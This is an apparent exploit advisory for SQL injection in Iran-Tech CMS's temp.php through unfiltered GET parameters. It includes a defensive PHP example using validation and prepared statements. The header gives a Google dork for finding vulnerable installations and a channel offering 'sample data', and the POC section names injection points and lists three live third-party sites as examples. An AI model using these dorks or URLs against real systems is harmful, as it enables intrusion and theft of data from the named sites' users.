####
#Exploit Title : Iran-Tech CMS Travel SQL Injection
#Author : Iran_bugs_report
#Home page Link : http://www.iran-tech.com
#Date : 2020-06-05
#Version: All versions
#Google Dork: [intext:"طراحی سایت: ایران تکنولوژی"] && find portfolio from here : http://www.iran-tech.com/portfolio/
#Contact:
#CrackSoftwareIrani@gmail.com
#OR
#CRACKANDHACK@protonmail.com
#OR
#Channel & Sample Data :
#https://t.me/Iran_bugs_report
####
// Vulnerability Description:
SQL injection vulnerability:-
==============================
In the file temp.php, data from the GET parameters 'irantech_parvaz' and 'ID' is not filtered before being passed into an SQL query,
which gives rise to an SQL injection vulnerability.
Example:
"temp.php?irantech_parvaz=170&id=1"
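
Added example (not Iran-Tech CMS source, which this advisory does not show): one way a handler like temp.php can validate the two parameters named above and bind them instead of concatenating them into the query. The table "tours", its columns, the function fetchTour and the allow-list contents are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list of values accepted for 'irantech_parvaz'.
const ALLOWED_MODULES = ['170', 'iranhoteldetail', 'contactus'];

// Unsafe pattern described in the advisory (shown for contrast, never executed):
//   $sql = "SELECT title FROM tours WHERE module = '" . $_GET['irantech_parvaz']
//        . "' AND id = " . $_GET['ID'];

function fetchTour(PDO $db, array $query): ?array
{
    $module = $query['irantech_parvaz'] ?? '';
    $id     = $query['ID'] ?? $query['id'] ?? '';
    // Reject anything outside the allow-list rather than stripping characters.
    if (!is_string($module) || !in_array($module, ALLOWED_MODULES, true)) {
        return null;
    }
    // ID must be a short run of decimal digits; arrays and other text are refused.
    if (!is_string($id) || !ctype_digit($id) || strlen($id) > 9) {
        return null;
    }
    // Bound parameters keep request data out of the SQL text entirely.
    $stmt = $db->prepare('SELECT id, title FROM tours WHERE module = :module AND id = :id');
    $stmt->bindValue(':module', $module, PDO::PARAM_STR);
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tours (id INTEGER PRIMARY KEY, module TEXT, title TEXT)');
$db->exec("INSERT INTO tours (id, module, title) VALUES (1, '170', 'Sample tour')");

// Constructed requests: one well-formed, three malformed.
$requests = [
    ['irantech_parvaz' => '170', 'ID' => '1'],      // row returned
    ['irantech_parvaz' => '170', 'ID' => '1x'],     // non-numeric ID refused
    ['irantech_parvaz' => 'unknown', 'ID' => '1'],  // module not on the allow-list
    ['irantech_parvaz' => ['170'], 'ID' => '1'],    // array-typed parameter refused
];
foreach ($requests as $q) {
    var_dump(fetchTour($db, $q));
}
```

With a MySQL backend, set PDO::ATTR_EMULATE_PREPARES to false so the binding is done by the database server rather than by client-side string substitution.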
-------------------
POC
-------------------
http://127.0.0.1/fa/user/temp.php?irantech_cms=SQL&ID=SQL {Injection_Here}
--------------------
POC
--------------------
Examples for SQL injection:
http://tariqagency.ir/en/user/temp.php?irantech_parvaz=170&id=1
https://mosafer24.ir/fa/user/temp.php?irantech_parvaz=iranhoteldetail&idhotel=31&idcity=80&level22=15
http://www.sarahotel.org/fa/user/temp.php?irantech_parvaz=contactus